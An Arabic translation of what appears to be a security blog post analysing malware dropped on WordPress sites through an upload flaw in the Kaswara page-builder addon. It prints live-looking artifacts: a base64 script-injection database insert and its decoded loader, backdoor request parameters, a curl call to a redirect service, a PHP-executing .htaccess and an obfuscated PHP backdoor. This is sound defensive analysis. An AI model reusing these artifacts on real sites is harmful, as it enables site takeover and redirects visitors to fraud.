Kaswara الحديث المعرض للخطر WPBakery Page Builder Addons Plugin الذي يتم استغلاله في البرية

مرة أخرى في 20 أبريل 2021 ، أبلغ أصدقاؤنا في WPScan عن وجود ثغرة أمنية خطيرة في Kaswara Modern VC Addons ، المعروف أيضًا باسم Kaswara Modern WPBakery Page Builder Addons. لم يعد متاحًا في Codecanyon / Envato ، مما يعني أنه إذا كان لديك هذا التشغيل ، فيجب عليك اختيار بديل.

تتيح هذه الثغرة الأمنية للمستخدمين غير المصادق عليهم تحميل ملفات عشوائية إلى دليل رمز البرنامج المساعد (./wp-content/uploads/kaswara/icons). هذا هو أول مؤشر للتسوية (IOC) شاركه أصدقاؤنا في WPScan معنا في تقريرهم.

تمنح القدرة على تحميل ملفات عشوائية إلى موقع ويب الفاعل السيئ السيطرة الكاملة على الموقع ، مما يجعل من الصعب تحديد الحمولة النهائية لهذه العدوى ؛ وبالتالي ، سنعرض لك كل ما وجدناه حتى الآن (لقد انطلقنا قليلاً في البحث ، لذلك لا تتردد في الانتقال إلى قسم IOC إذا كنت لا ترغب في القراءة بالكامل).

حقن قاعدة البيانات وتطبيقات Android المزيفة والأبواب الخلفية الأخرى

شكرًا لصديقنا Denis Sinegubko من Sucuri للإشارة إلى متابعة حقن قاعدة البيانات المستخدمة في هذا الهجوم.

يقوم الفاعلون السيئون بتحديث خيار "kaswara-customJS" لإضافة مقتطف ضار عشوائي من كود Javascript. إليك أحد الأمثلة التي وجدناها:

INSERT INTO `wp_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES (1856,'kaswara-customJS',
'dmFyIHNjcmlwdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoXCdzY3JpcHRcJyk7CnNjcmlwdC5vbmxvYWQgPSBm
dW5jdGlvbigpIHsKfTsKc2NyaXB0LnNyYyA9IFwiaHR0cHM6Ly9ldmFkYXYubGluay9zY3JpcHQuanNcIjsKZG9jdW1lbnQu
Z2V0RWxlbWVudHNCeVRhZ05hbWUoXCdoZWFkXCcpWzBdLmFwcGVuZENoaWxkKHNjcmlwdCk7','yes');

تترجم سلسلة base64 المشفرة هذه إلى:

var script = document.createElement(\'script\');
script.onload = function() {
};
script.src = \"hxxps://evadav[.]link/script.js\";
document.getElementsByTagName(\'head\')[0].appendChild(script);

وكما يحدث عادةً مع هذا النوع من البرامج النصية ، فإنه سيتم تحميل سلسلة من مقتطفات كود جافا سكريبت الأخرى ، وستكون الحمولة النهائية إما إعلانًا سيئًا أو مجموعة أدوات استغلال. هذا مشابه جدًا لما ذكره Wordfence هنا.

في هذه الحالة ، يموت النص على hxxp: // double-clickd [.] com / ولا يتم تحميل أي محتوى سيء. لقد وجدت أن Javascript مريبة تستدعي هذا الموقع منذ أوائل عام 2020 ويقوم الناس بالفعل بحظره منذ عام 2018.

تم تحميل تطبيقات وهمية على الموقع

كانت تطبيقات Android الأربعون الموجودة على مواقع الويب التي فحصناها عبارة عن إصدارات مزيفة من تطبيقات مختلفة ، مثل AliPay و PayPal و Correos و DHL والعديد من التطبيقات الأخرى ، والتي تم اكتشافها لحسن الحظ من قبل أشهر بائعي برامج مكافحة الفيروسات وفقًا لتحليل VirusTotal.

لم أتحقق من نوايا التطبيق ، ولكن مراجعة سريعة للأذونات التي يطلبها يمكن أن تعطينا لمحة عما يمكن أن يفعله:

• android.permission.WRITE_SMS
• android.permission.RECEIVE_SMS
• android.permission.FOREGROUND_SERVICE
• android.permission.KILL_BACKGROUND_PROCESSES
• android.permission.READ_CONTACTS
• android.permission.READ_PHONE_STATE
• android.permission.READ_SMS
• android.permission.ACCESS_NETWORK_STATE
• android.permission.QUERY_ALL_PACKAGES
• android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS
• android.permission.INTERNET
• android.permission.SEND_SMS
• android.permission.CALL_PHONE
• android.permission.WAKE_LOCK
• android.permission.REQUEST_DELETE_PACKAGES

ومع ذلك ، لا يتم تحميل هذه الملفات على الفور باستخدام استغلال Kaswara. بعد اختراق الموقع ، سيقوم المهاجمون بتحميل أدوات أخرى أولاً للتحكم الكامل في الموقع.

الملفات التي يتم تحميلها

تم العثور على بعض الأبواب الخلفية والبرامج الضارة الأخرى أيضًا على مواقع الويب التي تعرضت للاختراق بسبب هذه الثغرة الأمنية. سأشارك تحليلاً سريعًا لأكثر التحليلات شيوعًا وإثارة للاهتمام في هذا المنشور. ومع ذلك ، أود التركيز أولاً على أكثرها تعقيدًا.

إعادة توجيه وتطبيقات وهمية

لم يتم تحميل التطبيقات المزيفة التي وجدتها في العديد من المواقع المخترقة من خلال استغلال ثغرة Kaswara. يتم تحميلها على الموقع باستخدام أداة اختراق متعددة الوظائف ، والتي تسمح للمهاجم بتحميل بعض التعليمات البرمجية عن بُعد (من خلال توفير عنوان URL أو سلسلة) ، وإعادة توجيه المستخدم إلى موقع ضار.

يمكن التعرف على الملف بسهولة من خلال وجود هذه السلسلة: base64_decode('MTIz');error_reporting(0); وظيفة

ومن المثير للاهتمام أنه يقوم بترتيب كل شيء بشكل عشوائي ما عدا هذا.

توجد البرامج الضارة في سطر واحد ، وهي أيضًا لجنة IOC مثيرة للاهتمام إذا كنت تبحث عن هذا النوع من الشذوذ في التعليمات البرمجية.

لتسهيل الفهم ، قمت بفك تشفير معظم أجزاء الكود ، وأعدت تسمية الوظائف المثيرة للاهتمام وجمَّلت الكود. تتضمن البرامج الضارة 6 وظائف مختلفة ، 5 منها تستند إلى القيم التي تم تمريرها على المتغير $_GET['ts'] . بالنسبة لهذا المستند ، دعنا نفكر في إحدى الحالات العديدة التي وجدتها: c.php .

/c.php؟ts=kt

هذا لا يفعل شيئًا وسيجبر الموقع على إرجاع خطأ 500 (لاحقًا في الكود).

/c.php؟ts=1

يغير قيمة علامة $q1a إلى true لإجراء التحقق من صحة التعليمات البرمجية وإخراج رسالة OK إلى المهاجم.

في هذه الحالة يجيب الموقع البعيد: {"body":"","headers":["Location: http:\/\/good-valid-1"],"status":302,"contentType":""}

/c.php؟ts=sv&v=" Code"&p=40bd001563085fc35165329ea1ff5c5ecbdbbeef

يكتب ملفًا على الخادم برمز مقدم من محتويات $_GET["v"] طالما أن $_GET["p"] هو المجموع الاختباري SHA1 لـ 123 (تذكر أن IOC الأول لـ base64_decode('MTIz') ؟ هذا هل هذا المجموع الاختباري).

/c.php؟ts=tt

يكتب 5 ميغا بايت من "-" على الخادم ، وربما يستخدم لاختبار ما إذا كانت وظيفة التحميل ستعمل على الخادم.

/c.php؟ts=dwm&h=HASH1،HASH2

عندما يتلقى البرنامج الضار هذا الطلب ، فإنه يقوم بإجراء اختبار للتحقق مما إذا كانت الملفات التي تم تحميلها قد تمت كتابتها بنجاح إلى الخادم. يجب معرفة تجزئات MD5 الخاصة بهم وإرسالها إلى متغير $_GET['h'] كقيم مفصولة بفواصل.

/c.php؟ts=dw&h=hash&l=URLs_as_CSV

يقوم بتنزيل ملف من سلسلة من مواقع ويب الجهات الخارجية وحفظه على الخادم وتسميته بعد آخر 12 حرفًا من md5 للملف الذي تم تنزيله.

هذه هي الوظيفة المستخدمة لتحميل التطبيقات المزيفة على الخادم.

فيما يلي مثال لطلب تنزيل الملفات الضارة /c.php?ts=dw&h=7e7bcc10406f3787b0a08d4199e6a697&l=http%3A%2F%2Fsmurfetta.ru%2Fhash-de%2F%3Fh%3D7e7bcc10406f3787b0a08d4199e6a697

إعادة توجيه الوصول

إذا تم تحديد خيار kt أو لم يتم تحديد أي خيار ، فستنتقل الشفرة إلى إعادة التوجيه ، والتي يتم تحقيقها عن طريق طلب JSON blob بالبيانات المطلوبة. ثم يشرع في إعادة توجيه الزائر باستخدام وظيفة الرأس.

الرد كالتالي: {"body":"","headers":["Location: https:\/\/stunningawards.life\/?u=yuek60p&o=2k5p1e0&m=1"],"status":302,"contentType":""}

وظيفة تنفيذ طلب cURL بالمعلمات المطلوبة هي: لا شيء رائع ...

ويمكن ترجمتها إلى طلب cURL هذا:

curl -X POST hxxp://papass[.]ru/click_api/v3 \
    -H 'X-Forwarded-For: 200.171.221.1' \
    -H 'Accept-Language: *' \
    -H 'User-Agent: Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-G975F) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/14.0 Chrome/87.0.4280.141 Mobile Safari/537.36' \
    -d 'token=hmfovdqs9vfxp8s4rwqzxbfz6c43bwgb&force_redirect_offer=1&sub_id_1=dbhomeworkout.com&sub_id_2=dbhomeworkout.com&sub_id_3=dbhomeworkout.com&sub_id_4'

رابط عنوان URL النهائي ، بقدر ما أستطيع اختباره ، عشوائي ، ولكنه يشترك في نفس الخاصية لكونك صفحة مزيفة لخدمة أو تطبيق مشهور.

wp-content / uploads / kaswara / icons / 16 / javas.xml و wp-content / uploads / kaswara / icons / 16 / .htaccess

لا يتم عادةً وضع علامة على ملف XML باعتباره تهديدًا محتملاً ، ولكن في هذه الحالة ، لدينا ملف .htaccess مُعد خصيصًا لتغيير كيفية رؤية خادم الويب له:

Order Deny,Allow
Allow from all

<FilesMatch "_?(javas|homes|menus)\.(php|xml|pdf)\d*$">
    AddHandler application/x-httpd-php .xml .pdf
    AddType application/x-httpd-php .xml .pdf
    # ---
    SetHandler application/x-httpd-php
    ForceType application/x-httpd-php
    # ---
    php_value engine 1
    # ---
    Order Deny,Allow
    Allow from all
</FilesMatch>

في الواقع ، يخبر Apache أن يفهم أي ملفات جافا أو منازل أو قوائم باستخدام xml أو php أو pdf كملف PHP ليتم معالجتها وتنفيذها وفقًا لذلك. لذا ، فإن أيًا من هذه الملفات الموجودة في نفس بنية الدليل مثل htaccess. سيكون مريبًا.

ملف javas.xml هو نفسه بعض الملفات الضارة الأخرى التي تم تحميلها على الموقع. لقد وجدت أن الاختلاف هو أن البعض يحتوي على سطر أو سطرين فارغين في نهاية الملف ، مما يجعل التجزئة التقليدية أكثر صعوبة.

<?php
$LnWYZK 	  	="\163"."\164" 	 ."\162\137\162\157"	 	.	 	"\164"	. 		  (		 279	 	-  			266)	 	  ; 	 	 if( !empty		 	 (	$ { 	 $LnWYZK	   	
("\137"	.	"\103\102\106" 		 	.		 "\107")}	) 	 		)  			{  	 			 $nNZph 	 =$LnWYZK		 (	 		 "\172". 		"\161". 	(4334	 	
-4329	)		   	 	)			  ; $ouQLkV  	 	= $LnWYZK		 (	 	 	"\157\156"  	.  	"\146" .		 "\162"	.		  	 (	  9680	 	-	  9616)  	 . "\137" 		
. 		"\161"   		.   		"\162\160\142\161\162" 	 ) 		  ; 			  $VNfzSD  	 	=$LnWYZK("\160\145\162"."\156\147\162\137\163\150\141\160"	
. "\147\166\142\141" 			 ); 	  	foreach	($			  { 	 	 $LnWYZK(			  "\137".	 	"\103"  	.	  		"\102" . 			 "\106"	 	. 		"\107" 	 		
)  			}	  as	$IKRDzf   		=>	$NIvHUr	  )( 	  	$nNZph  			(	   	$IKRDzf  	)  	===	 	  		 "c"	  .  (2668 - 	  	2626	 		 )   			.   		
"\145\141"   		."\71"		   .  			"\67"	."\71\145\144"	 	.	  "\71\70\62"	.  	"\143\60" 	 . 	 	 	(314406	  -51163		 )	 	 	. "\60" 			 
.	"\145" 	 . 			 "\71" 	 .		   "\145" . "\71"	  		.	"\70"	  	 .			  "\141"	  		.	 	"\66" . 		"\66"	.	"\144"		  	.    		( 	  	9786	-		 	 
9780 		) 		  		 	&&  	$QZCMY	 		 =	 	  $VNfzSD( ""  			, 	 $ouQLkV (  	$NIvHUr)   		)  	) 		 		 	 	?$QZCMY 	 () : " 		"		  	
;  	}

يتم إخفاء الشفرة الضارة باستخدام سلاسل str_rot13 و base64 المشفرة. كما أنه يستخدم القيم السداسية العشرية والعمليات الحسابية لإخفاء السلاسل أكثر من ذلك بقليل. الحمولة النهائية غير معروفة لأنها ستنشئ وظيفة بناءً على قيم طلب POST. ومع ذلك ، يبدو أن الحمولة هي نفسها في كل مرة لأنها تعتمد على فحص md5 قبل إنشائها (c42ea979ed982c02632430e9e98a66d6 هو تجزئة md5).

خاتمة

نظرًا لأن هذه حملة نشطة ، في وقت كتابة هذا المنشور ، وجدنا المزيد والمزيد من أمثلة البرامج الضارة المختلفة التي يتم إسقاطها في المواقع المتأثرة. بعضها مجرد اختلافات لما لدينا هنا ، بينما البعض الآخر مثير للاهتمام بدرجة كافية لإجراء تحليل أعمق. ابحث عن بعض المنشورات الأصغر التي ستصدر قريبًا لاستكشاف بعض هذه الأمثلة الأخرى.

يوضح هذا أهمية تحديث ملحقاتك بأحدث إصلاحات الأمان ؛ إذا لم يقم المطورون بإصدار الإصلاحات في الوقت المناسب أو تمت إزالتها من مستودع WordPress.org (أو الأسواق الأخرى) ، فإننا نوصي بشدة بإيجاد بديل أكثر أمانًا له.

إذا كنت قلقًا بشأن البرامج الضارة والضعف في موقعك ، فتحقق من ميزات أمان Jetpack. يوفر Jetpack Security أمانًا سهل الاستخدام وشاملًا لموقع WordPress بما في ذلك النسخ الاحتياطية ومسح البرامج الضارة والحماية من البريد العشوائي.

مؤشرات التسوية

تجد هنا القائمة الكاملة لجميع بطاقات IOC التي حددناها: